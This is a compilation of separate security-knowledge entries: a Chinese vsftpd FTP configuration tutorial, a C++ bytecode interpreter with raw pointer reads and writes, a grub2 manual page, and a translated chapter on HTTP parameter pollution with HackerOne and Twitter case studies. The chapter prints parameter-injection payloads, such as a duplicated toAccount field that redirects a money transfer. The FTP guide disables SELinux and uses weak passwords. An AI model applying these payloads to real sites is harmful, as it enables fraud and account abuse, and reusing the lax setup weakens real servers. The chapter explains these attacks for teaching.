|禁止匿名访问模式| |local_enable=YES | 允许本地用户模式| |write_enable=YES | 设置可写权限| |local_umask=022 | 本地用户模式创建文件的 umask 值| |userlist_deny=YES |启用"禁止用户名单",名单文件为ftpusers和user_list| |userlist_enable=YES | 开启用户作用名单文件功能| ```vim vim /etc/vsftpd/vsftpd.conf 1 anonymous_enable=NO 2 local_enable=YES 3 write_enable=YES 4 local_umask=022 ``` ```bash setenforce 0 firewall-cmd --permanent --zone=public --add-service=ftp firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` 按理来讲,现在已经完全可以本地用户的身份登录 FTP 服务器了.但是在使用 root 管理员登录后,系统提示如下的错误信息: ```bash [root@linuxprobe ~]# ftp 192.168.10.10 Connected to 192.168.10.10 (192.168.10.10). 220 (vsFTPd 3.0.2) Name (192.168.10.10:root): root 530 Permission denied. Login failed. ftp> ``` 可见,在我们输入 root 管理员的密码之前,就已经被系统拒绝访问了.这是因为 vsftpd 服务程序所在的目录中默认存放着两个名为"用户名单"的文件 (ftpusers和user_list) .只要里面写有某位用户的名字,就不再允许这位用户登录到 FTP 服务器上. ```bash [root@linuxprobe ~]# cat /etc/vsftpd/user_list [root@linuxprobe ~]# cat /etc/vsftpd/ftpusers ``` 如果你确认在生产环境中使用 root 管理员不会对系统安全产生影响,只需按照上面的提示删除掉 root 用户名即可.我们也可以选择 ftpusers 和 user_list 文件中没有的一个普通用户尝试登录 FTP 服务器 在采用本地用户模式登录 FTP 服务器后,默认访问的是该用户的家目录,也就是说,访问的是 `/home/username` 目录.而且该目录的默认所有者、所属组都是该用户自己,因此不存在写入权限不足的情况. --- ## 虚拟用户 1. 创建用于进行 FTP 认证的用户数据库文件,其中奇数行为账户名,偶数行为密码.例如,我们分别创建出 zhangsan 和 lisi 两个用户,密码均为 redhat ```bash cd /etc/vsftpd/ ``` ```vim vim login.list zhangsan redhat lisi redhat ``` > 但是,明文信息既不安全,也不符合让 vsftpd 服务程序直接加载的格式,因此需要使用db_load 命令用哈希 (hash) 算法将原始的明文信息文件转换成数据库文件,并且降低数据库文件的权限 (避免其他人看到数据库文件的内容) ,然后再把原始的明文信息文件删除. ```bash db_load -T -t hash -f login.list login.db rm -f login.list ``` 2. 创建 vsftpd 服务程序用于存储文件的根目录以及虚拟用户映射的系统本地用户.FTP 服务用于存储文件的根目录指的是,当虚拟用户登录后所访问的默认位置 > 由于 Linux 系统中的每一个文件都有所有者、所属组属性,例如使用虚拟账户"张三"新建了一个文件,但是系统中找不到账户"张三",就会导致这个文件的权限出现错误.为此,需要再创建一个可以映射到虚拟用户的系统本地用户.简单来说,就是让虚拟用户默认登录到与之有映射关系的这个系统本地用户的家目录中,虚拟用户创建的文件的属性也都归属于这个系统本地用户,从而避免 Linux 系统无法处理虚拟用户所创建文件的属性权限. > 为了方便管理 FTP 服务器上的数据,可以把这个系统本地用户的家目录设置为 /var 目录 (该目录用来存放经常发生改变的数据) .并且为了安全起见,我们将这个系统本地用户设置为不允许登录 FTP 服务器,这不会影响虚拟用户登录,而且还可以避免黑客通过这个系统本地用户进行登录. ```bash useradd -d /home/ftp -s /sbin/nologin virtual chmod -Rf 755 /home/ftp ``` 3. 建立用于支持虚拟用户的 PAM 文件. 新建一个用于虚拟用户认证的 PAM 文件 vsftpd.vu,其中 PAM 文件内的"db="参数为使用 db_load 命令生成的账户密码数据库文件的路径,但不用写数据库文件的后缀: ```vim vim /etc/pam.d/vsftpd.vu auth required pam_userdb.so db=/etc/vsftpd/login account required pam_userdb.so db=/etc/vsftpd/login ``` 在 vsftpd 服务程序的主配置文件中通过 pam_service_name 参数将 PAM 认证文件的名称修改为 vsftpd.vu, 例如,在 vsftpd 服务程序的主配置文件中默认就带有参数 pam_service_name=vsftpd,表示登录 FTP 服务器时是根据 `/etc/pam.d/vsftpd` 文件进行安全认证的.现在我们要做的就是把 vsftpd 主配置文件中原有的 PAM 认证文件 vsftpd 修改为新建的 vsftpd.vu 文件即可. ```vim vim /etc/vsftpd/vsftpd.conf 1 anonymous_enable=NO 2 local_enable=YES 3 guest_enable=YES 4 guest_username=virtual 5 pam_service_name=vsftpd.vu 6 allow_writeable_chroot=YES ``` |参数 | 作用| | :------------- | :------------- | |anonymous_enable=NO |禁止匿名开放模式| |local_enable=YES | 允许本地用户模式| |guest_enable=YES | 开启虚拟用户模式| |guest_username=virtual | 指定虚拟用户账户| |pam_service_name=vsftpd.vu | 指定 PAM 文件| |allow_writeable_chroot=YES | 允许对禁锢的 FTP 根目录执行写入操作,而且不拒绝用户的登录请求| 为虚拟用户设置不同的权限.虽然账户 zhangsan 和 lisi 都是用于 vsftpd 服务程序认证的虚拟账户,但是我们依然想对这两人进行区别对待.比如,允许张三上传、创建、修改、查看、删除文件,只允许李四查看文件.这可以通过 vsftpd 服务程序来实现.只需新建一个目录,在里面分别创建两个以 zhangsan 和 lisi 命名的文件,其中在名为 zhangsan 的文件中写入允许的相关权限 ```vim mkdir /etc/vsftpd/user_conf/ cd /etc/vsftpd/user_conf/ touch lisi ``` ```vim vim zhangsan anon_upload_enable=YES anon_mkdir_write_enable=YES anon_other_write_enable=YES ``` 然后再次修改 vsftpd 主配置文件,通过添加 user_config_dir 参数来定义这两个虚拟用户不同权限的配置文件所存放的路径.为了让修改后的参数立即生效,需要重启 vsftpd 服务程序并将该服务添加到开机启动项中: ```vim vim /etc/vsftpd/vsftpd.conf user_config_dir=/etc/vsftpd/user_conf ``` ```bash setenforce 0 firewall-cmd --permanent --zone=public --add-service=ftp firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` --- ## 案例 ### 案例 1 - 使用虚拟用户认证方式,创建用户 virtftp,该用户的家目录为 `/data/ftp_data` ,shell 为 `/sbin/nologin` ,并将虚拟用户映射至 virtftp 用户; - 允许属主对 `/data/ftp_data` 有写权限; - 关闭 PASV 模式的安全检查; - 设置客户端最大连接数为 100,每个 IP 允许 3 个连接数; - ftpuser 虚拟用户可以下载与上传文件; - ftpadmin 虚拟用户可以下载与上传文件以及删除重命名操作,上传文件的 umask 为 022. - 配置文件要求: - 以下文件除了 vsftpd.conf 文件其余文件均需要自行创建 - /etc/vsftpd/vsftpd.conf(ftp 配置文件)/etc/pam.d/vsftpd.vu, (pam 配置文件) - /etc/vsftpd/vlogin.db, (用户数据库) - /etc/vsftpd/ftp_user (该目录下 ftp 用户权限配置目录) - ftpuser,ftpadmin 用户权限相关配置文件均在 /etc/vsftpd/ftp_user 目录下. **安装服务,配置虚拟用户认证** ```bash yum install -y vsftpd ``` ```vim cd /etc/vsftp vim vlogin.list ftpuser 123456 ftpadmin 123456 ``` ```bash db_load -T -t hash -f vlogin.list vlogin.db cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.vu ``` ```vim vim /etc/pam.d/vsftpd.vu auth required pam_userdb.so db=/etc/vsftpd/vlogin account required pam_userdb.so db=/etc/vsftpd/vlogin ``` **修改配置文件** ```vim vim /etc/vsftpd/vsftpd.conf pam_service_name=vsftpd.vu guest_enable=YES guest_username=virtftp user_config_dir=/etc/vsftpd/ftp_user allow_writeable_chroot=YES pasv_promiscuous=YES max_clients=100 max_per_ip=3 ``` **创建家目录为 /data/ftp_data,shell为/sbin/nologin 的 virtftp 用户;** ```bash useradd -d /data/ftp_data -s /sbin/nologin virtftp chmod -Rf 755 /data/ftp_data cd /data/ftp_data touch testfile ``` **配置权限文件** ```bash mkdir /etc/vsftpd/ftp_user cd /etc/vsftpd/ftp_user ``` ```vim vim ftpuser anon_upload_enable=YES ``` ```vim vim ftpadmin anon_upload_enable=YES anon_mkdir_wirte_enable=YES anon_other_wirte_enable=YES anon_umask=022 ``` **起服务** ```bash setenforce 0 firewall-cmd --zone=public --add-service=ftp firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` --- ### 案例 2 - 创建用户 tom,密码为 aaabbb. - 为 WEB 网站创建 FTP 站点,具体要求如下: - FTP 普通用户主目录: `/data/web_data` - FTP 访问权限:通过扩展 acl 方式允许用户 tom 读取和写入 - FTP 访问路径为: ftp://tom:aaabbb@公网IP/ - 为产品资料下载创建 FTP 站点,具体要求如下: - FTP 匿名用户主目录: `/data/instructions` - FTP 访问权限:允许匿名用户读取 - FTP 访问路径为: ftp://公网IP/ **修改配置文件** ```vim vim /etc/vsftpd/vsftpd.conf local_root=/data/web_data anon_root=/data/instructions anon_upload_enable=NO ``` **创建用户与 acl;** ```bash useradd tom passwd tom cd /data/web_data chmod -Rf 755 /data/web_data setfacl -R -m u:tom:rwx . touch success ``` **起服务** ```bash setenforce 0 firewall-cmd --zone=public --add-service=ftp firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` --- ### 案例 3 - 拒绝匿名访问,只允许本地系统用户登录; - 使用被动模式,设置主机B公网 IP 为被动模式数据传输地址 - 所有用户主目录为 `/data/ftp_data` 宿主为 virtual 用户; - 将用户使用文件的方式记录账号以及密码; - ftpuser1 用户只能下载不能上传以及删除文件重命名操作; - ftpuser2 可以下载与上传文件以及删除重命名操作; - ftpadmin 可以下载与上传文件以及删除重命名操作,上传文件的 umask 为 022; - 配置文件要求: - 以下文件除了 vsftpd.conf 文件其余文件均需要自行创建: - /etc/vsftpd/vsftpd.conf(ftp配置文件)/etc/pam.d/vsftpd.vu, (pam 配置文件) - /etc/vsftpd/vlogin.db, (用户数据库) - /etc/vsftpd/user_conf (该目录下 ftp 用户权限配置目录) - ftpuser1,ftpuser2,ftpadmin 用户权限相关配置文件均在 `/etc/vsftpd/user_conf` 目录下. **安装服务,配置虚拟用户认证** ```bash yum install -y vsftpd cd /etc/vsftp ``` ```vim vim vlogin.list ftpuser1 123456 ftpuser2 123456 ftpadmin 123456 ``` ```bash db_load -T -t hash -f vlogin.list vlogin.db cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.vu ``` ```vim vim /etc/pam.d/vsftpd.vu auth required pam_userdb.so db=/etc/vsftpd/vlogin account required pam_userdb.so db=/etc/vsftpd/vlogin ``` **修改配置文件** ```vim vim /etc/vsftpd/vsftpd.conf anonymous_enable=NO pam_service_name=vsftpd.vu guest_enable=YES guest_username=virtual user_config_dir=/etc/vsftpd/ftp_user allow_writeable_chroot=YES pasv_enable=YES # 启用 pasv 模式 pasv_min_port=30000 # pasv 端口起始号 pasv_max_port=40000 # pasv 端口结束号 xferlog_enable=YES # 启用上传和下载的日志功能,默认开启. xferlog_file=/var/log/xferlog # vsftpd 的日志存放位置 ``` **创建家目录为 `/data/ftp_data` 的 virtual 用户;** ```bash useradd -d /data/ftp_data -s /sbin/nologin virtual chmod -Rf 755 /data/ftp_data cd /home/ftp/ touch testfile grep virtftp /etc/passwd ``` **配置权限文件** ```bash mkdir /etc/vsftpd/ftp_user cd /etc/vsftpd/ftpuser1 ``` ```vim vim ftpuser vim ftpuser2 anon_upload_enable=YES anon_mkdir_wirte_enable=YES anon_other_wirte_enable=YES vim ftpadmin anon_upload_enable=YES anon_mkdir_wirte_enable=YES anon_other_wirte_enable=YES anon_umask=022 ``` **起服务** ```bash setenforce 0 firewall-cmd --zone=public --add-port=30000-40000/tcp --permanent firewall-cmd --zone=public --add-port=30000-40000/udp --permanent firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ``` --- ### 案例 4 - 创建用户 tom,密码为 aaabbb; - 禁止匿名用户登录; - 使用被动模式,设置主机B公网 IP 为被动模式数据传输地址; - 为 mariadb 数据库创建 FTP 站点,具体要求如下: - FTP 普通用户主目录: `/data/mariadb_data` ; - FTP 访问权限:通过扩展 acl 方式设置用户 tom 拥有读、写、执行权限; - FTP 访问路径为: ftp://tom:aaabbb@公网IP/. **修改配置文件** ```vim vim /etc/vsftpd/vsftpd.conf anonymous_enable=NO local_root=/data/mariadb_data pasv_enable=YES # 启用 pasv 模式 pasv_min_port=30000 # pasv 端口起始号 pasv_max_port=40000 # pasv 端口结束号 ``` **创建用户与 acl;** ```bash useradd tom passwd tom cd /data/mariadb_data chmod -Rf 755 /data/mariadb_data setfacl -R -m u:tom:rwx . touch success ``` **起服务** ```bash setenforce 0 firewall-cmd --zone=public --add-port=30000-40000/tcp --permanent firewall-cmd --zone=public --add-port=30000-40000/udp --permanent firewall-cmd --reload systemctl restart vsftpd systemctl enable vsftpd ```
sec-knowleage
#include <stdio.h> #include <string.h> #include <inttypes.h> #include <iostream> #include <iomanip> typedef int32_t int32; typedef int64_t int64; const void *last_accessed_pointer; //#define ENABLE_VO_DEBUG_MESSAGES void debug (const char *msg1, const char *msg2 = 0); void debug (const char *msg1, const int arg2); void debugptr (const char *ptr); int end_of_execution (const char *&ptr); int printf_command (const char *&ptr); int strcmp_command (const char *&ptr); void assign_variable_command (const char *&ptr); void jump_command (const char *&ptr); void if_then_else_command (const char *&ptr); bool do_comparison (const char *&ptr); int64 get_argument (const char *&ptr); void skip_argument (const char *&ptr); const int pointer_size = 8; const int constant_size = 4; const char *init_program (int *argcptr, char *argv[]); int main_loop (const char *ptr); int main (int argc, char *argv[]) { const char *ptr = init_program (&argc, argv); int ret = 0; try { ret = main_loop (ptr); } catch (const char *err_msg) { printf ("Exception: %s\n", err_msg); } return ret; } void debug (const char *msg1, const char *msg2) { #ifdef ENABLE_VO_DEBUG_MESSAGES if (msg2 == 0) { printf ("\t--- %s\n", msg1); } else { printf ("\t--- %s | %s\n", msg1, msg2); } #endif } void debug (const char *msg1, const int arg2) { #ifdef ENABLE_VO_DEBUG_MESSAGES printf ("\t--- %s [0x%x]\n", msg1, arg2); #endif } void debugptr (const char *ptr) { #ifdef ENABLE_VO_DEBUG_MESSAGES printf ("\t\t[ptr-1, ptr, ptr+1] => [0x%x 0x%x 0x%x]\n", *(ptr-1), *ptr, *(ptr+1)); #endif } int main_loop (const char *ptr) { ptr += 8; for (;;) { debug("before switch-case..."); debugptr (ptr); switch (*ptr++) { case 0x00: debug("0x00 -> end_of_execution"); return end_of_execution (ptr); case 0x01: debug("0x01 -> if_then_else_command"); debugptr (ptr); if_then_else_command (ptr); break; case 0x03: debug("0x03 -> jump_command"); jump_command (ptr); break; case 0x05: debug("0x05 -> assign_variable_command"); assign_variable_command (ptr); break; case 0x0F: debug("0x02 -> printf_command"); printf_command (ptr); break; case 0x10: debug("0x04 -> strcmp_command"); strcmp_command (ptr); break; } } } int end_of_execution (const char *&ptr) { const int arg0 = get_argument (ptr); return arg0; } int printf_command (const char *&ptr) { const char *format = (const char *) get_argument (ptr); return printf (format); } int strcmp_command (const char *&ptr) { const char *arg0 = (const char *) get_argument (ptr); const char *arg1 = (const char *) get_argument (ptr); debug("strcmp args:"); debug("\t", arg0); debug("\t", arg1); return strcmp (arg0, arg1); } void assign_variable_command (const char *&ptr) { const int64 dest_ptr = get_argument (ptr); const int64 content = get_argument (ptr); last_accessed_pointer = (void *) dest_ptr; const char type = *ptr; ++ptr; if (type == 0x01) { // char dest *((char *) last_accessed_pointer) = char (content); } else if (type == 0x02) { // int dest *((int32 *) last_accessed_pointer) = int32 (content); } else if (type == 0x03) { // pointer dest *((int64 *) last_accessed_pointer) = content; } else { throw "assign_variable_command: wrong type"; } } void jump_command (const char *&ptr) { const int offset = get_argument (ptr); ptr += offset; } void if_then_else_command (const char *&ptr) { const bool res = get_argument (ptr); const int thenpart = get_argument (ptr); const int elsepart = get_argument (ptr); if (res) { ptr += thenpart; } else { ptr += elsepart; } } bool do_comparison (const char *&ptr) { const char type = *ptr; ++ptr; if (type == 0x1) { debug ("do_comparison: 0x1 <"); debugptr (ptr); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 < arg1; } else if (type == 0x02) { debug ("do_comparison: 0x2 <="); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 <= arg1; } else if (type == 0x03) { debug ("do_comparison: 0x3 >"); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 > arg1; } else if (type == 0x04) { debug ("do_comparison: 0x4 >="); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 >= arg1; } else if (type == 0x05) { debug ("do_comparison: 0x5 =="); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 == arg1; } else if (type == 0x06) { debug ("do_comparison: 0x6 !="); const int64 arg0 = get_argument (ptr); const int64 arg1 = get_argument (ptr); return arg0 != arg1; } else if (type == 0x07) { debug ("do_comparison: 0x7 &&"); const int64 arg0 = get_argument (ptr); if (!arg0) { skip_argument (ptr); return false; } const int64 arg1 = get_argument (ptr); return bool(arg1); } else if (type == 0x08) { debug ("do_comparison: 0x8 ||"); const int64 arg0 = get_argument (ptr); if (arg0) { skip_argument (ptr); return true; } const int64 arg1 = get_argument (ptr); return bool(arg1); } else { throw "wrong operator"; } } int64 get_argument (const char *&ptr) { const char type = *ptr; ++ptr; if (type == 0x01) { debug ("get_argument: 0x01 -> pointer argument"); const int **arg0 = (const int **) ptr; ptr += pointer_size; last_accessed_pointer = *arg0; return **arg0; } else if (type == 0x02) { debug ("get_argument: 0x02 -> constant argument"); const int32 *arg0 = (const int32 *) ptr; ptr += constant_size; last_accessed_pointer = 0; return *arg0; } else if (type == 0x03) { debug ("get_argument: 0x03 -> pointer to char argument"); const char **arg0 = (const char **) ptr; ptr += pointer_size; last_accessed_pointer = *arg0; return **arg0; } else if (type == 0x04) { debug ("get_argument: 0x04 -> pointer to pointer argument"); const int64 **arg0 = (const int64 **) ptr; ptr += pointer_size; last_accessed_pointer = *arg0; return **arg0; } else if (type == 0x05) { debug ("get_argument: 0x05 -> minus operator"); const int64 res = -get_argument (ptr); last_accessed_pointer = 0; return res; } else if (type == 0x06) { debug ("get_argument: 0x06 -> boolean condition: 1< 2<= 3> 4>= 5== 6!= 7&& 8||"); debugptr (ptr); const bool res = do_comparison (ptr); last_accessed_pointer = 0; return res; } else if (type == 0x07) { debug ("get_argument: 0x07 -> char variable reference"); const int32 *offset = (const int32 *) ptr; ptr += constant_size; last_accessed_pointer = ptr + (*offset); const char *var = (const char *) last_accessed_pointer; return *var; } else if (type == 0x08) { debug ("get_argument: 0x08 -> int variable reference"); const int32 *offset = (const int32 *) ptr; ptr += constant_size; last_accessed_pointer = ptr + (*offset); const int32 *var = (const int32 *) last_accessed_pointer; return *var; } else if (type == 0x09) { debug ("get_argument: 0x09 -> pointer variable reference"); const int32 *offset = (const int32 *) ptr; ptr += constant_size; last_accessed_pointer = ptr + (*offset); const int64 *var = (const int64 *) last_accessed_pointer; return *var; } else if (type == 0x0A) { debug ("get_argument: 0x0A -> char array dereference"); const int64 base_ptr = get_argument (ptr); const int32 array_index = get_argument (ptr); const char &val = ((const char *) base_ptr)[array_index]; last_accessed_pointer = &val; return val; } else if (type == 0x0B) { debug ("get_argument: 0x0B -> int array dereference"); const int64 base_ptr = get_argument (ptr); const int32 array_index = get_argument (ptr); const int32 &val = ((const int32 *) base_ptr)[array_index]; last_accessed_pointer = &val; return val; } else if (type == 0x0C) { debug ("get_argument: 0x0C -> pointer array dereference"); const int64 base_ptr = get_argument (ptr); const int32 array_index = get_argument (ptr); const void *&val = ((const void **) base_ptr)[array_index]; last_accessed_pointer = &val; return int64 (val); } else if (type == 0x0D) { debug ("get_argument: 0x0D -> address-of accessed lhs argument"); /*const int64 accessed_value =*/ get_argument (ptr); if (last_accessed_pointer == 0) { throw "accessed argument is rhs and has no address"; } const int64 res = int64 (last_accessed_pointer); last_accessed_pointer = 0; return res; } else if (type == 0x0E) { debug ("get_argument: 0x0E -> subtract"); const int64 left = get_argument (ptr); const int64 right = get_argument (ptr); last_accessed_pointer = 0; return left - right; } else if (type == 0x0F) { debug ("get_argument: 0x0F -> printf call"); last_accessed_pointer = 0; return printf_command (ptr); } else if (type == 0x10) { debug ("get_argument: 0x10 -> strcmp call"); last_accessed_pointer = 0; return strcmp_command (ptr); } else if (type == 0x11) { debug ("get_argument: 0x11 -> string constant"); const char **str = (const char **) ptr; ptr += pointer_size; last_accessed_pointer = str; return int64 (*str); } else if (type == 0x12) { debug ("get_argument: 0x12 -> add"); const int64 left = get_argument (ptr); const int64 right = get_argument (ptr); last_accessed_pointer = 0; return left + right; } else { debug ("get_argument: unknown-type", type); throw "wrong type"; } } void skip_argument (const char *&ptr) { const char type = *ptr; ++ptr; switch (type) { case 0x01: case 0x03: case 0x04: case 0x11: ptr += pointer_size; break; case 0x02: case 0x07: case 0x08: case 0x09: ptr += constant_size; break; case 0x06: ++ptr; case 0x0A: case 0x0B: case 0x0C: case 0x0E: case 0x10: case 0x12: skip_argument (ptr); case 0x0D: case 0x05: case 0x0F: skip_argument (ptr); break; default: throw "wrong type"; } }
sec-knowleage
grub2-set-default === 设置系统默认的启动内核 ## 语法 ```shell Usage: grub2-set-default [OPTION] MENU_ENTRY Set the default boot menu entry for GRUB. This requires setting GRUB_DEFAULT=saved in /etc/default/grub. -h, --help print this message and exit -v, --version print the version information and exit --boot-directory=DIR expect GRUB images under the directory DIR/grub2 instead of the /boot/grub2 directory MENU_ENTRY is a number, a menu item title or a menu item identifier. Report bugs to <bug-grub@gnu.org>. ``` ## 实例 查看可选的系统内核: ```shell # awk -F\' '$1=="menuentry " {print $2}' /etc/grub2.cfg CentOS Linux (5.4.219-1.el7.elrepo.x86_64) 7 (Core) CentOS Linux (3.10.0-1160.76.1.el7.x86_64) 7 (Core) CentOS Linux (3.10.0-862.el7.x86_64) 7 (Core) CentOS Linux (0-rescue-3221d376917c458992a952d6327f2d6a) 7 (Core) ``` grub2-set-default后面的序号从0开始。所以,如果想设置第一个选项为默认启动内核,则可以使用下面的命令: ```shell # grub2-set-default 0 ``` 如果想使用CentOS Linux (3.10.0-862.el7.x86_64) 7 (Core)内核版本,则可以将0改为2 重启系统 ```shell ~]# init 6 ```
sec-knowleage
# 六、HTTP 参数污染 > 作者:Peter Yaworski > 译者:[飞龙](https://github.com/) > 协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) ## 描述 HTTP 参数污染,或者 HPP,在网站接受用户输入,将其用于生成发往其它系统的 HTTP 请求,并且不校验用户输出的时候发生。它以两种方式产生,通过服务器(后端)或者通过客户端。 在 StackExchange 上,SilverlightFox 提供了一个 HPP 服务端攻击的不错的例子。假设我们拥有以下站点:`https://www.example.com/transferMoney.php`,它可以通过 POST 方法访问,带有以下参数: ``` amount=1000&fromAccount=12345 ``` 当应用处理请求时,它生成自己的发往其它后端系统的 POST 请求,这实际上会使用固定的`toAccount`参数来处理事务。 分离后端 URL:`https://backend.example/doTransfer.php` 分离后端参数:`toAccount=9876&amount=1000&fromAccount=12345` 现在,如果在提供了重复的参数时,后端仅仅接受最后一个参数,并且假设攻击者修改了发往网站的 POST 请求来提交`toAccount`参数,像这样: ``` amount=1000&fromAccount=12345&toAccount=99999 ``` 存在 HPP 漏洞的站点就会将请求转发给另一个后端系统,像这样: ``` toAccount=9876&amount=1000&fromAccount=12345&toAccount=99999 ``` 这里,由恶意用户提交的第二个`toAccount`参数,会覆盖后端请求,并将钱转账给恶意用户调教得账户(`99999`)而不是由系统设置的预期账户(`9876`)。 如果攻击者打算修改它们自己的请求,并且由漏洞系统处理,这非常实用。但是如果攻击者可以从另一个攒点生产链接,并且诱使用户无意中提交恶意请求,并带有由攻击者附加的额外参数,它也可以对攻击者更加实用一些。 另一方面,HPP 客户端涉及到向链接和其它`src`属性注入额外的参数。在 OWASP 的一个例子中,假设我们拥有下列代码: ```php <? $val=htmlspecialchars($_GET['par'],ENT_QUOTES); ?> <a href="/page.php?action=view&par='.<?=$val?>.'">View Me!</a> ``` 它从 URL 接受`par`的值,确保它是安全的,并从中创建链接。现在,如果攻击者提交了: ``` http://host/page.php?par=123%26action=edit ``` 产生的链接可能为: ```html <a href="/page.php?action=view&par=123&amp;action=edit">View Me!</a> ``` 这会导致应用接受编辑操作而不是查看操作。 HPP 服务端和客户端都依赖于所使用的的后端技术,以及在收到多个名称相同的参数时,它的行为如何。例如,PHP/Apache 使用最后一个参数,Apache Tomcat 使用第一个参数,ASP/IIS 使用所有参数,以及其他。所以,没有可用于提交多个同名参数的单一保险的处理方式,发现 HPP 需要一些经验来确认你所测试的站点如何工作。 ## 示例 ### 1\. HackerOne 社交分享按钮 难度:低 URL:https://hackerone.com/blog/introducing-signal-and-impact 报告链接;https://hackerone.com/reports/105953 报告日期:2015.12.18 奖金:$500 描述:HackerOne 包含链接,用于在知名社交媒体站点上分享内容,例如 Twitter,Fackbook,以及其他。这些社交媒体的链接包含用于社交媒体链接的特定参数。 攻击者可以将另一个 URL 参数追加到链接中,并让其指向任何他们所选的站点。HackerOne 将其包含在发往社交媒体站点的 POST 请求中,因而导致了非预期的行为。这就是漏洞所在。 漏洞报告中所用的示例是将 URL: https://hackerone.com/blog/introducing-signal 修改为: https://hackerone.com/blog/introducing-signal?&u=https://vk.com/durov 要注意额外的参数`u`。如果恶意更新的链接有 HackerOne 访客点击,尝试通过社交媒体链接分享内容,恶意链接就变为: https://www.facebook.com/sharer.php?u=https://hackerone.com/blog/introducing-signal?&u=https://vk.com/durov 这里,最后的参数`u`就会拥有比第一个更高的优先级,之后会用于 Fackbook 的发布。在 Twitter 上发布时,建议的默认文本也会改变: https://hackerone.com/blog/introducing-signal?&u=https://vk.com/durov&text=another_site:https://vk.com/durov > 重要结论 > 当网站接受内容,并且似乎要和其他 Web 服务连接时,例如社交媒体站点,一定要寻找机会。 > 这些情况下,被提交的内容可能在没有合理安全检查的情况下传递。 ### 2\. Twitter 取消订阅提醒 难度:低 URL:twitter.com 报告链接:https://blog.mert.ninja/twitter-hpp-vulnerability/ 报告日期:2015.8.23 奖金:$700 描述: 2015 年 8 月,黑客 Mert Tasci 在取消接收 Twitter 的提醒时,注意到一个有趣的 URL。 https://twitter.com/i/u?t=1&cn=bWV&sig=657&iid=F6542&uid=1134885524&nid=22+26 (我在书里面把它缩短了一些)。你注意到参数 UID 了嘛?这碰巧是你的 Twitter 账户 UID。现在,要注意,他做了我认为多数黑客都会做的事情,他尝试将 UID 修改为其它用户,没有其它事情。Twitter 返回了错误。 考虑到其他人可能已经放弃了,Mert 添加了第二个 UID 参数,所以 URL 看起来是这样: https://twitter.com/i/u?iid=F6542&uid=2321301342&uid=1134885524&nid=22+26 然后就成功了。他设法取消订阅了其它用户的邮件提醒。这就说明,Twitter 存在 HPP 取消订阅的漏洞。 > 重要结论 > 通过一段简短的描述,Mert 的努力展示了坚持和知识的重要性。如果它在测试另一个作为唯一参数的 UID 之后,远离了这个漏洞,或者它根本不知道 HPP 类型漏洞,他就不会收到 $700 的奖金。 > 同时,要保持关注参数,类似 UID,它们包含在 HTTP 请求中,因为我在研究过程中见过很多报告,它们涉及到操纵参数的值,并且 Web 应用做出了非预期的行为。 ### 3\. Twitter Web Intents 难度:低 URL:twitter.com 报告链接:https://ericrafaloff.com/parameter-tampering-attack-on-twitter-web-intents 报告日期:2015.11 奖金:未知 描述: 根据它们的文档,Twitter Web Intents,提供了弹出优化的数据流,用于处理 Tweets & Twitter 用户:发推、回复、转发、喜欢和关注。它使用户能够在你的站点上下文中,和 Twitter 的内容交互,而不需要离开页面或者授权新的应用来交互。这里是它的一个示例: ![](img/6-3-1.jpg) Twitter Intent 充分测试之后,黑客 Eric Rafaloff 发现,全部四个 Intent 类型:关注用户、喜欢推文、转发和发推,都存在 HPP 漏洞。 根据他的博文,如果 Eric 创建带有两个`screen_name`参数的 URL: https://twitter.com/intent/follow?screen_name=twitter&scnreen_name=erictest3 Twitter 会通过让第二个`screen_name`比第一个优先,来处理这个请求。根据 Eric,Web 表单类似这样: ```html <form class="follow " id="follow_btn_form" action="/intent/follow?screen_name=er\ icrtest3" method="post"> <input type="hidden" name="authenticity_token" value="..."> <input type="hidden" name="screen_name" value="twitter"> <input type="hidden" name="profile_id" value="783214"> <button class="button" type="submit"> <b></b><strong>Follow</strong> </button> </form> ``` 受害者会看到在一个`screen_name`中定义的用户资料,`twitter`,但是点击按钮后,它们会关注`erictest3`。 与之类似,当展现 intent 用于喜欢时,Eric 发现它能够包含`screen_name `参数,虽然它和喜欢这个推文毫无关系,例如: https://twitter.com/intent/like?tweet_id=6616252302978211845&screen_name=erictest3 喜欢这个推文会向受害者展示正确的用户资料,但是点击“关注”之后,它仍然会关注`erictest3`。 > 重要结论 > 这个类似于之前的 Twitter UID 漏洞。不出意料,当一个站点存在 HPP 漏洞时,它就可能是更广泛的系统化问题的指标。有时如果你找到了类似的漏洞,它值得花时间来整体探索该平台,来看看是否存在其它可以利用相似行为的地方。这个例子中,就像上面的 UID,Twitter 接受用户标识,`screen_name`,它基于后端逻辑易受 HPP 攻击。 ## 总结 HTTP 参数污染的风险实际上取决于后端所执行的操作,以及被污染的参数提交到了哪里。 发现这些类型的漏洞实际上取决于经验,比其他漏洞尤甚,因为网站的后端行为可能对于黑客来说是黑盒。常常,作为一个黑客,对于后端在接收了你的输入之后进行了什么操作,你需要拥有非常细微的洞察力。 通过尝试和错误,你可能能够发现一些情况,其中站点和其它服务器通信,之后开始测试参数污染。社交媒体链接通常是一个不错的第一步,但是要记住保持挖掘,并且当你测试类似 UID 的参数替换时,要想到 HPP。
sec-knowleage
# HackerOneReports Here you can find mostly all disclosed h1 reports up to 02/01/2020 If you have any questions or improvements to the structured data please do not hesitate to ask or suggest.
sec-knowleage
